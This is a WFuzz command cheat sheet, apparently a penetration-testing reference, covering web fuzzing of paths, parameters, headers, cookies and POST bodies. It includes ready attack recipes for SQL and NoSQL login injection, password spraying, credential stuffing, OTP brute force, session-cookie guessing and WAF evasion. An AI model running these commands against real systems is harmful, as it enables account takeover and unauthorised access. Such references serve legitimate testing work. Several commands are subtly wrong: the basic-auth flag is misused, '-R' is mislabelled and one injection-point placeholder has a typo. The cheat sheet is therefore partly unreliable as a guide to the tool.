WFuzz
FUZZ Keyword Basics
# Basic directory fuzzing
wfuzz -c -w <wordlist> <url>/FUZZ
# With extensions
wfuzz -c -w <wordlist> <url>/FUZZ.php
# Status code filter (hide 404)
wfuzz -c -w <wordlist> --hc 404 <url>/FUZZ
# Show only 200 responses
wfuzz -c -w <wordlist> --sc 200 <url>/FUZZ
# Threads
wfuzz -c -z file,<wordlist> -t 50 --hc 404 <url>/FUZZ
# No color output
wfuzz -w <wordlist> --hc 404 <url>/FUZZ
Multiple Injection Points (FUZZ / FUZ2Z / FUZ3Z)
# Two injection points
wfuzz -c -z file,users.txt -z file,<wordlist> --hc 404 <url>/FUZ/FUZ2Z
# Username + password brute
wfuzz -c -z file,users.txt -z file,<wordlist> \
-d "username=FUZZ&password=FUZ2Z" --hc 200 <url>/login
# Three injection points
wfuzz -c -z file,list1.txt -z file,list2.txt -z file,list3.txt \
<url>/FUZZ/FUZ2Z/FUZ3Z --hc 404
# Parameter name + value discovery
wfuzz -c -z file,/usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt \
-z file,<wordlist> --hc 404 "<url>?FUZZ=FUZ2Z"
Filter Options
# Hide by status code (one or more)
wfuzz -c -w <wordlist> --hc 404 <url>/FUZZ
wfuzz -c -w <wordlist> --hc 404,403,400 <url>/FUZZ
# Show by status code
wfuzz -c -w <wordlist> --sc 200 <url>/FUZZ
wfuzz -c -w <wordlist> --sc 200,301,302 <url>/FUZZ
# Hide by number of lines
wfuzz -c -w <wordlist> --hl 42 <url>/FUZZ
# Show by number of lines
wfuzz -c -w <wordlist> --sl 10 <url>/FUZZ
# Hide by number of words
wfuzz -c -w <wordlist> --hw 15 <url>/FUZZ
# Show by number of words
wfuzz -c -w <wordlist> --sw 50 <url>/FUZZ
# Hide by response size (bytes/chars)
wfuzz -c -w <wordlist> --hh 1234 <url>/FUZZ
# Show by response size
wfuzz -c -w <wordlist> --sh 5000 <url>/FUZZ
# Regex match (show if matches)
wfuzz -c -w <wordlist> --ss "admin|login|dashboard" <url>/FUZZ
# Regex hide (hide if matches)
wfuzz -c -w <wordlist> --hs "Not Found|Error" <url>/FUZZ
Authentication
# Basic HTTP auth
wfuzz -c -w <wordlist> --hc 401 -u <username>:<password> <url>/FUZZ
# Brute force basic auth
wfuzz -c -z file,users.txt -z file,<wordlist> \
--hc 401 -u FUZZ:FUZ2Z <url>/FUZZ
# Cookie-based session
wfuzz -c -w <wordlist> --hc 404 -b "session=abc123" <url>/FUZZ
# Cookie brute (session token fuzz)
wfuzz -c -w <wordlist> --hc 302 -b "session=FUZZ" <url>/dashboard
# Bearer token
wfuzz -c -w <wordlist> --hc 404 -H "Authorization: Bearer <password>" <url>/api/FUZZ
# Multiple cookies
wfuzz -c -w <wordlist> -b "auth=abc123; csrf=xyz" --hc 404 <url>/FUZZ
# Custom header
wfuzz -c -w <wordlist> -H "X-Forwarded-For: 127.0.0.1" --hc 404 <url>/FUZZ
# Fuzz header value
wfuzz -c -w <wordlist> -H "X-Custom-Header: FUZZ" --hc 404 <url>/admin
# User agent fuzzing
wfuzz -c -w /usr/share/seclists/Fuzzing/User-Agents/user-agents.txt \
-H "User-Agent: FUZZ" --hc 403 <url>/admin
# Host header fuzzing (vhost)
wfuzz -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt \
-H "Host: FUZZ.<domain>" --hh 1234 http://<ip>/
# Content-Type fuzzing
wfuzz -c -z list,"application/json-application/xml-text/plain" \
-H "Content-Type: FUZZ" --sc 200 <url>/api/upload
POST Data Fuzzing
# POST parameter value
wfuzz -c -w <wordlist> -d "username=admin&password=FUZZ" --hc 200 <url>/login
# POST parameter name
wfuzz -c -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt \
-d "FUZZ=test" --hc 500 <url>/api
# JSON POST
wfuzz -c -w <wordlist> \
-H "Content-Type: application/json" \
-d '{"username":"FUZZ","password":"test"}' \
--hc 401 <url>/api/login
# XML POST
wfuzz -c -w <wordlist> \
-H "Content-Type: application/xml" \
-d '<user><name>FUZZ</name></user>' \
--sc 200 <url>/api/users
# Multi-field POST brute force
wfuzz -c -z file,users.txt -z file,<wordlist> \
-d "user=FUZZ&pass=FUZ2Z" --hc 200 <url>/login
Cookies
# Single cookie
wfuzz -c -w <wordlist> -b "session=FUZZ" --sc 200 <url>/profile
# Multiple cookies, fuzz one
wfuzz -c -w <wordlist> -b "session=abc123; role=FUZZ" --sc 200 <url>/admin
# Cookie + POST
wfuzz -c -w <wordlist> \
-b "session=abc123" \
-d "action=FUZZ" \
--hc 403 <url>/admin/action
Encoders
# URL encode the payload
wfuzz -c -w <wordlist> -w <wordlist>:urlencode --hc 404 <url>/FUZZ
# Base64 encode
wfuzz -c -w <wordlist>:base64 --hc 404 <url>/FUZZ
# HTML encode
wfuzz -c -w <wordlist>:html --hc 404 <url>/FUZZ
# MD5 hash
wfuzz -c -w <wordlist>:md5 --hc 404 <url>/FUZZ
# Double URL encode (bypass WAF)
wfuzz -c -w <wordlist>:urlencode:urlencode --hc 404 <url>/FUZZ
# Multiple encoders (try all against each word)
wfuzz -c -w <wordlist>:urlencode,base64 --hc 404 <url>/FUZZ
# List available encoders
wfuzz -e encoders
Iterators
# Default: zip (pairs elements 1:1)
wfuzz -c -z file,list1.txt -z file,list2.txt --hc 404 <url>/FUZZ/FUZ2Z
# Product (all combinations)
wfuzz -c -z file,list1.txt -z file,list2.txt -m product --hc 404 <url>/FUZZ/FUZ2Z
# Chain (concatenate wordlists)
wfuzz -c -z file,list1.txt -z file,list2.txt -m chain --hc 404 <url>/FUZZ
# List iterator
wfuzz -c -z list,"admin-user-test-guest" --hc 404 <url>/FUZZ
Common Attack Patterns
Auth Bypass
# SQL injection in login
wfuzz -c -w /usr/share/seclists/Fuzzing/SQLi/Generic-SQLi.txt \
-d "username=FUZZ&password=test" --hc 200 <url>/login
# NoSQL injection
wfuzz -c -w /usr/share/seclists/Fuzzing/Databases/NoSQL.txt \
-H "Content-Type: application/json" \
-d '{"username":{"$gt":""},"password":{"$gt":""}}' \
--sc 200 <url>/api/login
# Admin path bypass
wfuzz -c -w /usr/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt \
--hc 404 <url>/FUZZ
# HTTP verb bypass for 403
wfuzz -c -z list,"GET-POST-PUT-PATCH-DELETE-OPTIONS-HEAD-TRACE" \
-X FUZZ --hc 403 <url>/admin
Parameter Discovery
# Hidden GET parameter discovery
wfuzz -c -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt \
--hh 1234 "<url>?FUZZ=test"
# Hidden POST parameter discovery
wfuzz -c -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt \
-d "FUZZ=test" --hh 1234 <url>/submit
# IDOR parameter fuzzing
wfuzz -c -z range,1-1000 --hc 404 "<url>/user?id=FUZZ"
VHOST / Subdomain
# VHost fuzzing
wfuzz -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt \
-H "Host: FUZZ.<domain>" --hh 1234 http://<ip>/
# Subdomain + path
wfuzz -c -z file,/usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt \
-z file,<wordlist> -H "Host: FUZZ.<domain>" \
--hc 404 "http://<ip>/FUZ2Z"
Credential Brute Force
# Password spray (one password, many users)
wfuzz -c -w /usr/share/seclists/Usernames/top-usernames-shortlist.txt \
-d "username=FUZZ&password=<password>" \
--hc 200 <url>/login
# Credential stuffing
wfuzz -c -z file,users.txt -z file,passwords.txt \
-d "user=FUZZ&pass=FUZ2Z" -m product \
--hc 200 <url>/login
# OTP/PIN brute force
wfuzz -c -z range,0000-9999 \
-d "otp=FUZZ" --sc 302 <url>/verify
Output & Misc
# Output to file
wfuzz -c -w <wordlist> --hc 404 <url>/FUZZ -f output.txt,raw
# Output as JSON
wfuzz -c -w <wordlist> --hc 404 <url>/FUZZ -f output.json,json
# Proxy
wfuzz -c -w <wordlist> --hc 404 -p 127.0.0.1:8080 <url>/FUZZ
# SOCKS5 proxy
wfuzz -c -w <wordlist> --hc 404 -p 127.0.0.1:1080:SOCKS5 <url>/FUZZ
# Delay between requests
wfuzz -c -w <wordlist> --hc 404 -s 0.5 <url>/FUZZ
# Max recursion (follow location headers)
wfuzz -c -w <wordlist> --hc 404 -R 3 <url>/FUZZ
# Limit concurrent connections
wfuzz -c -w <wordlist> --hc 404 -t 10 <url>/FUZZ
# Follow redirects
wfuzz -c -w <wordlist> --hc 404 -L <url>/FUZZ
# List available plugins
wfuzz -e payloads
wfuzz -e iterators
wfuzz -e printers
